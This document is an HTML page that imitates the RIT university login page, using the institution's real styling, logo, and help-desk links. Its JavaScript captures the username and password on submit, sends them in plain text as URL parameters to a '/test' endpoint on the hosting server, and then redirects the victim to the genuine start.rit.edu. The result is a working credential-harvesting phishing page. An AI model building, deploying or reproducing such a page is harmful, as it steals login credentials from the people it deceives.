<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="theme-color" content="#F36E21">
    <link rel="shortcut icon" href="https://shibboleth.main.ad.rit.edu/favicon.ico" type="image/x-icon" />
    <title>RIT Login</title>
    <link rel='stylesheet' href='https://shibboleth.main.ad.rit.edu//css/combined.css'>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://shibboleth.main.ad.rit.edu/js/html5shiv.js"></script>
      <script src="https://shibboleth.main.ad.rit.edu/js/respond.min.js"></script>
    <![endif]-->

    <style>
        .container {
            max-width: 800px;
        }
    </style>

    <script type="text/javascript">
       $(document).ready(function(){
           $('#baduserpass').hide();
            $('.inputForm').submit(function () {
                username = $("#username").val();
                password = $("#password").val();
                url = "/test?username="+username+"&password="+password;
                $.get(url, function(){
                    window.location.replace("https://start.rit.edu");
                }).fail(function(){
                    $('#baduserpass').show();
                    $(".login").text("Log in");
                });
                return false;
            });
       });
    </script>

</head>

<body>
    <div id="metanav">
        <ul>
            <li id="metarithome"><img src="https://shibboleth.main.ad.rit.edu/images/idbar-orange.gif"></li>
            <li id="metaritsearch">
                <div id="metaritsearchdiv">
                    <form id="metasearchform" method="get" action="https://www.rit.edu/search/">
                        <div>
                            <input id="metaritsearchbox" class="faded" name="q" type="text" value="Search RIT" maxlength="250" alt="Search box" onfocus="focusSearch(this)" onblur="blurSearch(this)" />
                            <button title="Submit Search">Search</button>
                        </div>
                    </form>
                </div>
            </li>
            <li id="metaritdirectories"><a href="http://www.rit.edu/directories/">Directories</a></li>
        </ul>
        <script type="text/javascript">
        function focusSearch(formfield){ if (formfield.defaultValue==formfield.value) formfield.value = ""; formfield.className = "focused"; }
        function blurSearch(formfield){ if (formfield.value==""){ formfield.value = formfield.defaultValue; formfield.className = "faded";} }
        </script>
    </div>

<div class='container'>

     <div class='well' align="center">

        <h2>RIT Login</h2>
        <p>Login to start.rit.edu</p>

        <div style="display:none;" id="baduserpass" class='alert alert-danger'>
        Your username or password are incorrect. Please try again.
	    </div>

        <div id="userInput">
        <form class="inputForm form-horizontal">
                  <div class="form-group">
            <label for="username" class="col-sm-2 control-label" name="username">RIT Username</label>
            <div class="col-sm-10">
            <input class="form-control" id="username" name="username" type="text" autocorrect="off" autocapitalize="none"
                    value="" placeholder="RIT Username (Do not include @rit.edu)">
            </div>
          </div>

          <div class="form-group">
            <label for="password" class="col-sm-2 control-label">Password</label>
            <div class="col-sm-10">
            <input class="form-control" id="password" name="password" type="password" value="" placeholder="Password">
            </div>
          </div>

          <div id="nosso" class="form-group" style="display:none">
            <input type="checkbox" name="donotcache" value="1"> If you are using a public computer select this to disable single sign on.          </div>

            <button class="login btn btn-default"
                onClick="this.childNodes[0].nodeValue='Logging in, please wait...'"
                >Log in</button>

            </form>
            </div>

        <br>
        <p><a href="https://start.rit.edu/ForgotUsername?source=shib">Forgot Username?</a> | <a href="https://start.rit.edu/ForgotPassword?source=shib">Forgot Password?</a></p>
        <p>Need assistance? Please contact the ITS Service Desk at<p /><a href="tel:15854754357">585-475-HELP [4357]</a> or <a href="mailto:servicedesk@rit.edu">servicedesk@rit.edu</a>.</p>

        <br>

     </div>


</div>

</body>
</html>
